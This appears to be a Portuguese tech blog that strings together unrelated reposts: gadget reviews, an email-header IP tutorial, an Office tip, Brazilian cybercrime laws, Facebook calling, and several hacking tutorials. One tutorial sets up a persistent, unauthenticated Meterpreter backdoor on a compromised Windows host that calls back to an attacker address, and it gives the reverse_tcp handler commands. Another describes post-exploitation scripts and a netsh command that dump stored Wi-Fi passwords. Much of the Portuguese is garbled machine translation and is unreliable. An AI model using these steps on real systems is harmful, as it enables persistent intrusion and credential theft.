Luminária USB em Forma de Lâmpada Incandescente

 

Bright-Idea-USB-Lightbulb

Existem muitos notebooks sem iluminação no teclado e escrever no escuro com um computador desses vira uma tarefa complicada de adivinhação. Para isto existem muitas opções de luzes USB disponíveis no mercado de vários tipos diferentes, mas este modelo da Mustard tem um design incrível e bem familiar.

Bright Idea USB Lightbulb tem a forma de uma lâmpada incandescente que todos conhecemos, presa num braço articulado, e com uma iluminação azul suave, que não vai atrapalhar a visão da tela.

O Bright Idea USB Lightbulb custa £10 na pré-venda da Mustard.

Fonte:DigitalDrops

Fone de Ouvido Bluetooth com Touchpad

 

Finger-Swipe-Headphones

Os fones de ouvido Bluetooth têm um problema comum, a dificuldade em encontrar e acertar os botões desejados sem olhar, só com a mão. Os erros são comuns e em vez de diminuir, você aumenta o som ou desliga, quando quer pular a música.

Finger Swipe Headphones acaba com o problema da maneira mais óbvia possível, elimina os botões e usa toda a superfície do fone sensível ao toque. O fone esquerdo funciona como um touchpad para controlar a música arrastando o dedo na superfície: ao deslizar o dedo para cima e para baixo é possível aumentar ou diminuir o som e arrastando o dedo horizontalmente faz a música avançar ou retroceder. Excelente ideia!

Finger Swipe Headphones vem com microfone, desliga a música automaticamente ao receber uma ligação e é equipado com dois drivers 40mm com frequência de resposta de 20Hz a 2KHz. O fone é dobrável e tem 10 horas de autonomia com a carga completa.

O par de fones de ouvido Finger Swipe Headphones custa US$149,95 na Hammacher Schlemmer.

Fonte:DigitalDrops

Como verificar o IP do remetente de um e-mail

Nesse tutorial,vou  mostrar como detectar o endereço IP do remetente.

O e-mail endereço IP do remetente é depender de qual provedor de e-mail que você usa. Como sabemos, há muitos provedor de email que fornecem conta de e-mail gratuito, mas por agora só usamos Gmail, Yahoo e Windows Live Hotmail. Com a lógica como verificar o endereço IP do remetente de e-mail que eu espero que você também pode fazer o mesmo com outro provedor de e-mail.

 

Requirement:

1. Internet connection :-)

Step by Step how to Check Email Sender IP Address:

1. First step I will try to send an email from Yahoo account to Gmail account.

How to Check Email Sender IP Address

2. In Gmail you can view the email sender IP address by show the original email in the menu.

How to Check Email Sender IP Address

3. When you click the link it will show some text page that displaying the details of how the message sent from Yahoo until the email arrive in your inbox. Actually the logic is the same when you sending a packet through ups or fedex, you can track the path of your packet where they made a checkpoint(but not as detail as this two logistics service).

How to Check Email Sender IP Address

The text “Received: from” will show you the email sender IP address (see the red box).

From this three steps, we know that if the sender use Yahoo, we can know the sender original IP address.

4. Now the next I will try to send email fro Gmail to Yahoo. Here is the screenshot.

How to Check Email Sender IP Address

5.To check the email sender IP address, you can click the actions and choose view full header.

How to Check Email Sender IP Address

6. Gmail will use the X-Originating-IP to show the sender IP address, but for the privacy they mask and change the Original email sender IP address with Google ip address.

How to Check Email Sender IP Address

If you see the email sender IP address in the red box above, it was Google IP address.

7. Now the last one is testing using Windows Live Hotmail. I try to send it both to Gmail and yahoo. Here is the result in Gmail.

How to Check Email Sender IP Address

Last year Windows Live Hotmail still have the X-Originating-IP, but start in January 2013 they said that they started to protect their users by disable the X-Originating-IP and new variable show up there as X-EIP. This X-EIP is always change dynamically even you send the same email from the same ip address, so maybe it’s a little hard enough to break it :-)

8. Update (the real case)

When I just want to finish this tutorial, then suddenly one email come to my inbox, thanks to that guy helped me to finish this tutorial :-P

How to Check Email Sender IP Address

Rea is one of my friend in Indonesia, I believe she will not sending me this kind of link :-)

Since the sender was using yahoo account, so it is possible for us to detect the original IP address where they come from.

How to Check Email Sender IP Address

9. Now after knowing the email sender IP address 79.129.249.124, let’s find out more about this IP address by whois-ing here using my tools, or you can visit whatismyipaddress.com to check about that email sender IP address. Here is the result:

How to Check Email Sender IP Address

Conclusion:

1. From the three free email provider above, we know that the format of email header is depend on which provider we use to send that email.

2. If you send email from Gmail and Windows Live Hotmail they will hide the email sender IP address.

3. If you send email from Yahoo the recipient of your email can know your ip address.

hope it useful :-)

FONTE:Vishnuvalentino

 

Ajustar transparência de uma imagem no Office

Inserir Figura como AutoForma

Se quiser controlar o grau de transparência de uma imagem, siga os passos abaixo.

Vá no menu Inserir e clique em Formas e selecione Retângulo:

Desenhe um retâgulo no corpo do Documento do tamanho aproximado da figura que você deseja inserir:

Selecione a AutoForma, clique no menu Ferramentas de Desenho e selecione Imagem…:

Na janela que aparecer, selecione a figura desejada e clique em Inserir:

A imagem aparecerá no corpo do Documento:

Para remover as bordas azuis, selecione a imagem e vá em Ferramentas de Desenho, Contorno da Forma e selecione Sem Contorno:

Com a imagem selecionada, clique com o botão direito e selecione Formatar Forma…:

Uma janela aparecerá. Vé em Preenchimento, ajuste o nível de Transparência desejado e, em seguida, clique em Fechar:

Observe agora que a figura apresenta transparência:

Para que o texto sobreponha a imagem, com a figura selecionada, clique em Ferramentas de Imagem e selecione Atrás do texto:

Pronto, agora você tem uma imagem que foi criada através de uma AutoForma transparente:

 

Fonte:AmbienteOffice

Mantendo acesso no host comprometido

Galera, tutorial está parte dele em inglês.

Algumas pessoas e ACERCA estudante pedindo o que devemos fazer depois de explorar com sucesso comprometer ou vítima?

Alguns explorar Tal como CVE-2010-3962 quando a vítima Executado pode fazer computador trava. Quando algum usuário de computador trava optar por reiniciar o computador e ele vai fazer o exploit Torna-se ineficaz anterior.

O que vamos fazer aqui é Mantendo o acesso, a deixar-se uma maneira mais fácil de volta para o sistema posteriormente. Ao utilizar este método, se o serviço é para baixo ou você explorados atualizado, você ainda pode ganhar acesso ao sistema para uso futuro.

O Serviço Meterpreter Metasploit persistente é o que vamos usar neste tutorial, mas não há aviso Quando você usa esse Meterpreter persistente como mostrado neste tutorial requer nenhuma autenticação. Isto significa que ganha acesso a qualquer um que possa acessar a porta de sua porta de trás! Esta não é uma coisa boa se você está conduzindo um teste de penetração, este poderia ser como um risco significativo.

Requirement :

1. Backtrack 5 (or other Linux OS)

2. Metasploit Framework 3 (Included in Backtrack 5)

Step By Step :

1. You need to set your payload of your exploit to meterpreter to do this method.

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

2. run persistence -h to view help list

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

3. We will configure our persistent Meterpreter session to wait until a user logs on to the remote system and try toconnect back to our listener every 5 seconds at IP address 192.168.8.89 on port 8080.

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

Notice that the script output gives you the command to “remove” the persistent listener when you are done with it. Be sure to make note of it so you don’t leave an unauthenticated backdoor on the system.

Explanation :

-U : start the backdoor when user log in to system

-i : load backdoor every 5 second

-p : will running on port 8080

-r : connect back to 192.168.8.90 (specified ip address)

4. To make sure that it works, try reboot the remote system and set up our payload handler.

msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.90
LHOST => 192.168.8.90
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.8.90:8080
[*] Starting the payload handler...

5. When the remote user restart the system and re-login to the system, there should be like this(we should wait until the backdoor executed by remote system) :

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

Let we see what happen to remote user :

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

There’s established connection between attacker and remote host.

Hope it’s useful :-)

Fonte:VishnuValentino

Wireless Scripts para Meterpreter

Esses scripts fornecer funcionalidade relacionada com o tema sem fio ou redes sem fio. O objectivo destes é o de extrair o máximo de informação que pode existir perfis sem fios armazenado na máquina violados. No Windows 7 ou Vista você obter a senha para redes WPA, enquanto o Windows XP é obtido PBKDF2 chave derivada.

O script de post/windows/wlan/wlan_bss_list fornece informações sobre as redes sem fio que tenha violado a máquina configurada. O script de pós / windows / WLAN / wlan_current_connection rede WiFi mostra que a máquina está ligada comprometida, se ele estiver conectado a um. O post script / windows / wlan / wlan_disconnect tentar desligar o aparelho violado a conexão sem fio. E, finalmente, o post script / windows / wlan / wlan_profile recupera informações em formato XML, referindo-se a redes sem fio configurados na máquina violada, incluindo informações como a senha da rede Wi-Fi.

Uma vez que você tem uma sessão Meterpreter, a primeira ação que ocorre é fazer uma lista de redes sem fio que o aparelho armazenar, este fato significa que, geralmente, em algum momento violou a máquina está ligada a essas redes .

 

Com o script de post/windows /wlan /wlan_profile pode obter um despejo de um arquivo em formato XML com os detalhes de redes sem fio, incluindo senhas esta informação para se conectar a redes sem fio. Na foto você pode ver uma parte do depósito, a parte em que informações sensíveis, como senha e nome da rede.

 

Finalmente, você também pode realizar esta operação através da linha de comando da máquina violados. Para abrir uma linha de comando comando é executado Meterpreter shell e digite netsh wlan mostra perfil para recuperar informações de redes sem fio configurados na máquina violados.

Fonte:FluProject

 

Cafeteira em Forma de Motor V12

 

Cafeteira-Expresso-Veloce-V12

A incrível máquina de café Expresso Veloce vai deixar suas visitas boquiabertas!

A cafeteira Expresso Veloce V12 tem a forma de um motor de corrida V12 feito com materiais nobres como titânio, magnésio e alumínio. A cafeteira faz um delicioso café estilo italiano, é feita à mão e tem edição limitada em 500 unidades.

A cafeteira também está disponível na versão motor V10 e o preço só sob consulta, mas já dá para prever que é bem alto.

Fonte:DigitalDrops

WDivulge, Descubrindo pastas e arquivos ocultos

As auditorias web, é imprescindível a utilização de uma ferramenta como “enumeração. Isto ajuda-nos a encontrar painéis de administração, diretório com informações confidenciais. E até mesmo diretórios com permissões incorretas que permitem que lista arquivos.

Faça o download da ferramenta e ver listas de arquivos que vai procurar

darkmac:lists marc$ more files.txt
“pictures”[###]\”.jpg”
“DCP_”[####]\”.jpg”
“IMG_”[####]\”.jpg”
“”[##]\”.jpg”
“dsc”[#####]\”.jpg”
“dscn”[####]\”.jpg”
“mvc-”[###]\”.jpg”
“mvc”[#####]\”.jpg”
“P101″[####]\”.jpg”
“IMG_”[###]\”.jpg”
“IMAG”[####]\”.jpg”
“_MG_”[####]\”.jpg”
“dscf”[####]\”.jpg”
“pdrm”[####]\”.jpg”
“IM”[######]\”.jpg”
“EX”[######]\”.jpg”
“pict”[####]\”.jpg”
“P”[#######]\”.JPG”
“IMGP”[####]\”.JPG”
“PANA”[####]\”.JPG”
“Image(“[##]\”).JPG”
“DSCI”[####]\”.JPG”
“PICT”[#####]\”.jpg”
“HPIM”[####]\”.jpg”
“DSCN”[####]\”.jpg”
“DSC”[#####]\”.jpg”
“IMG_”[#####]\”.jpg”
darkmac:lists marc$

Podemos modificar esta lista a adicionar as nossas.

Lançamos a ferramenta contra um servidor web em um ambiente controlado.

O pedido irá tornar a ferramenta é como se segue:

“GET /pictures298.jpg HTTP/1.1″

Se vemos que os pedidos estão surgindo realmente, podemos ver os logs do servidor

Como você pode ver a ferramenta está a tentar combinações diferentes, se, por exemplo, deseja bloquear este difusor, poderíamos criar algo como:

#Block scanners
 <Directory / >
     BrowserMatch ^wdivulge deny_host
     Deny from env=deny_host
  </Directory>

Temos uma ferramenta mais para o nosso arsenal!

Fonte:Flu

Lei dos Crimes Cibernéticos entrará em vigor em 02/04/2013

Amanhã (dia 02/04/2013) entrarão em vigor as leis 12.735/2012 e 12.737/2012. Abaixo listo alguns artigos interessantes sobre o impacto das novas leis para os profissionais de segurança brasileiros (especialmente os que fazem pentest e pesquisa de vulnerabilidades) e demais atores que agora passam a estar sujeitos às penas previstas nas novas legislações, que determinam para o crime de invasão de dispositivos – por exemplo – até dois anos de prisão.

Ainda sobre o tema, o site InternetLegal possui uma listagem exaustiva das “Principais Leis Federais sobre Informática, Telemática, Internet” – http://www.internetlegal.com.br/biblioteca/legislacao/\

Fonte:SandroSuffert

Como fazer ligações gratuitas pelo Facebook no Brasil

O recurso de ligações via Wi-Fi ou 3G/4G através do Facebook usando o app Messengerpara iOS e Android já estava disponível desde janeiro em alguns países. Agora, está disponível no Brasil. Já apareceu aí no seu?

Não é preciso atualizar o app, basta ter a última versão (disponível na App Store e no Google Play). Para ver se o recurso está habilitado, clique em algum contato e depois no “i” do canto superior direito.

Como ligar no Facebook.

Se sim, aparecerá a opção de realizar a chamada, “Ligação gratuita”. Apenas clique e espere o contato atender. Há relatos, ainda não confirmados, de que a opção só surja para quem cadastro o número do celular no perfil da rede social — quem não está apto ganha um botão cinza/inativo. Outra exigência é que o botão só aparece funcional se as duas pessoas tiverem a última versão do app.

Note que existe um monte de “se”, e para piorar o app não tem um filtro que facilite a descoberta de quem está habilitado para conversar. O jeito é clicar de contato em contato e ver se a opção aparece ali. Nada conveniente, mas um esforço válido na hora de economizar com voz, ou falar com alguém que você não tenha o número.

Ultrapassadas essas barreiras, porém, a qualidade da ligação é boa. Nos rápidos testes que fizemos aqui, notamos um chiado no início, mas algo bem rápido e que, em seguida, some e dá lugar a vozes bastante claras e fáceis de compreender. Nos testes com o 3G da Vivo em Niterói (valeu, Felipe!) a qualidade se manteve, então nesse ponto (qualidade de voz) não há muito do que reclamar.

Eu, porém, pareço não estar dando muita sorte. Não sei se é alguma zica com minha conexão ou com o smartphone, mas 1) não consigo fazer chamadas, só receber; e 2) elas caem após ~30 segundos. Ou talvez seja algum problema com o Facebook. Testei com três pessoas e, com todas elas os mesmos sintomas se manifestaram. Pedi ao Felipe e outros amigos que verificassem se esse problema da queda após 30s se repetia, e com eles não aconteceu. O que foi que eu te fiz pra merecer isso, Zuck?

Fonte:Gizmodo